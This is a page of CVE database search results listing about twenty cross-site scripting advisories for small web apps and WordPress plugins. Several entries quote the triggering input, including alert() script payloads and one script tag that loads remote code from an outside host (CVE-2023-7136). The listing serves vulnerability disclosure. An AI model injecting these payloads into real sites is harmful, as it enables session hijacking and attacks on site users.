Export limit exceeded: 46610 CVEs match your query. Please refine your search to export 10,000 CVEs or fewer.
Export limit exceeded: 46610 CVEs match your query. Please refine your search to export 10,000 CVEs or fewer.
Search
Search Results (46610 CVEs found)
| CVE | Vendors | Products | Updated | CVSS v3.1 |
|---|---|---|---|---|
| CVE-2024-0782 | 1 Online Railway Reservation System Project | 1 Online Railway Reservation System | 2024-11-21 | 3.5 Low |
| A vulnerability has been found in CodeAstro Online Railway Reservation System 1.0 and classified as problematic. This vulnerability affects unknown code of the file pass-profile.php. The manipulation of the argument First Name/Last Name/User Name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251698 is the identifier assigned to this vulnerability. | ||||
| CVE-2024-0726 | 1 Projectworlds | 1 Student Project Allocation System | 2024-11-21 | 4.3 Medium |
| A vulnerability was found in Project Worlds Student Project Allocation System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin_login.php of the component Admin Login Module. The manipulation of the argument msg with the input test%22%3Cscript%3Ealert(%27Torada%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251549 was assigned to this vulnerability. | ||||
| CVE-2024-0720 | 1 Factominer | 1 Factoinvestigate | 2024-11-21 | 3.5 Low |
| A vulnerability, which was classified as problematic, was found in FactoMineR FactoInvestigate up to 1.9. Affected is an unknown function of the component HTML Report Generator. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251544. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | ||||
| CVE-2024-0718 | 1 Liuwy-dlsdys | 1 Zhglxt | 2024-11-21 | 2.4 Low |
| A vulnerability, which was classified as problematic, has been found in liuwy-dlsdys zhglxt 4.7.7. This issue affects some unknown processing of the file /oa/notify/edit of the component HTTP POST Request Handler. The manipulation of the argument notifyTitle leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251543. | ||||
| CVE-2024-0696 | 1 Atrocore | 1 Atropim | 2024-11-21 | 3.5 Low |
| A vulnerability, which was classified as problematic, was found in AtroCore AtroPIM 1.8.4. This affects an unknown part of the file /#ProductSerie/view/ of the component Product Series Overview. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251481 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | ||||
| CVE-2024-0647 | 1 Sparksuite | 1 Simplemde | 2024-11-21 | 4.3 Medium |
| A vulnerability, which was classified as problematic, was found in Sparksuite SimpleMDE up to 1.11.2. This affects an unknown part of the component iFrame Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251373 was assigned to this vulnerability. | ||||
| CVE-2024-0503 | 1 Sherlock | 1 Online Fir System | 2024-11-21 | 3.5 Low |
| A vulnerability was found in code-projects Online FIR System 1.0. It has been classified as problematic. This affects an unknown part of the file registercomplaint.php. The manipulation of the argument Name/Address leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250611. | ||||
| CVE-2024-0499 | 1 Oretnom23 | 1 House Rental Management System | 2024-11-21 | 2.4 Low |
| A vulnerability, which was classified as problematic, has been found in SourceCodester House Rental Management System 1.0. This issue affects some unknown processing of the file index.php. The manipulation of the argument page leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250607. | ||||
| CVE-2024-0420 | 1 Mappresspro | 2 Mappress Maps, Mappress Maps For Wordpress | 2024-11-21 | 6.1 Medium |
| The MapPress Maps for WordPress plugin before 2.88.15 does not sanitize and escape the map title when outputting it back in the admin dashboard, allowing Contributors and above roles to perform Stored Cross-Site Scripting attacks | ||||
| CVE-2024-0346 | 1 Vehicle Booking System Project | 1 Vehicle Booking System | 2024-11-21 | 3.5 Low |
| A vulnerability has been found in CodeAstro Vehicle Booking System 1.0 and classified as problematic. This vulnerability affects unknown code of the file usr/user-give-feedback.php of the component Feedback Page. The manipulation of the argument My Testemonial leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250114 is the identifier assigned to this vulnerability. | ||||
| CVE-2024-0318 | 1 Fireeye | 1 Hxtool | 2024-11-21 | 5.4 Medium |
| Cross-Site Scripting in FireEye HXTool affecting version 4.6. This vulnerability allows an attacker to store a specially crafted JavaScript payload in the 'Profile Name' and 'Hostname/IP' parameters that will be triggered when items are loaded. | ||||
| CVE-2024-0310 | 2 Microsoft, Trellix | 2 Windows, Endpoint Security Web Control | 2024-11-21 | 6.1 Medium |
| A content-security-policy vulnerability in ENS Control browser extension prior to 10.7.0 Update 15 allows a remote attacker to alter the response header parameter setting to switch the content security policy into report-only mode, allowing an attacker to bypass the content-security-policy configuration. | ||||
| CVE-2024-0246 | 1 Icewarp | 1 Icewarp | 2024-11-21 | 4.3 Medium |
| A vulnerability classified as problematic has been found in IceWarp 12.0.2.1/12.0.3.1. This affects an unknown part of the file /install/ of the component Utility Download Handler. The manipulation of the argument lang with the input 1%27"()%26%25<zzz><ScRiPt>alert(document.domain)</ScRiPt> leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249759. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | ||||
| CVE-2024-0226 | 1 Synopsys | 1 Seeker | 2024-11-21 | 4.8 Medium |
| Synopsys Seeker versions prior to 2023.12.0 are vulnerable to a stored cross-site scripting vulnerability through a specially crafted payload. | ||||
| CVE-2023-7173 | 1 Phpgurukul | 1 Hospital Management System | 2024-11-21 | 4.3 Medium |
| A vulnerability, which was classified as problematic, was found in PHPGurukul Hospital Management System 1.0. This affects an unknown part of the file registration.php. The manipulation of the argument First Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249357 was assigned to this vulnerability. | ||||
| CVE-2023-7171 | 1 Xxyopen | 1 Novel-plus | 2024-11-21 | 2.4 Low |
| A vulnerability was found in Novel-Plus up to 4.2.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file novel-admin/src/main/java/com/java2nb/novel/controller/FriendLinkController.java of the component Friendly Link Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The patch is named d6093d8182362422370d7eaf6c53afde9ee45215. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-249307. | ||||
| CVE-2023-7166 | 1 Xxyopen | 1 Novel-plus | 2024-11-21 | 3.5 Low |
| A vulnerability classified as problematic has been found in Novel-Plus up to 4.2.0. This affects an unknown part of the file /user/updateUserInfo of the component HTTP POST Request Handler. The manipulation of the argument nickName leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is c62da9bb3a9b3603014d0edb436146512631100d. It is recommended to apply a patch to fix this issue. The identifier VDB-249201 was assigned to this vulnerability. | ||||
| CVE-2023-7154 | 1 Morehubbub | 1 Hubbub Lite | 2024-11-21 | 4.8 Medium |
| The Hubbub Lite (formerly Grow Social) WordPress plugin before 1.32.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) | ||||
| CVE-2023-7149 | 1 Code-projects | 1 Qr Code Generator | 2024-11-21 | 3.5 Low |
| A vulnerability was found in code-projects QR Code Generator 1.0. It has been classified as problematic. This affects an unknown part of the file /download.php?file=author.png. The manipulation of the argument file with the input "><iMg src=N onerror=alert(document.domain)> leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249153 was assigned to this vulnerability. | ||||
| CVE-2023-7136 | 1 Code-projects | 1 Record Management System | 2024-11-21 | 2.4 Low |
| A vulnerability classified as problematic was found in code-projects Record Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /main/doctype.php of the component Document Type Handler. The manipulation of the argument docname with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249139. | ||||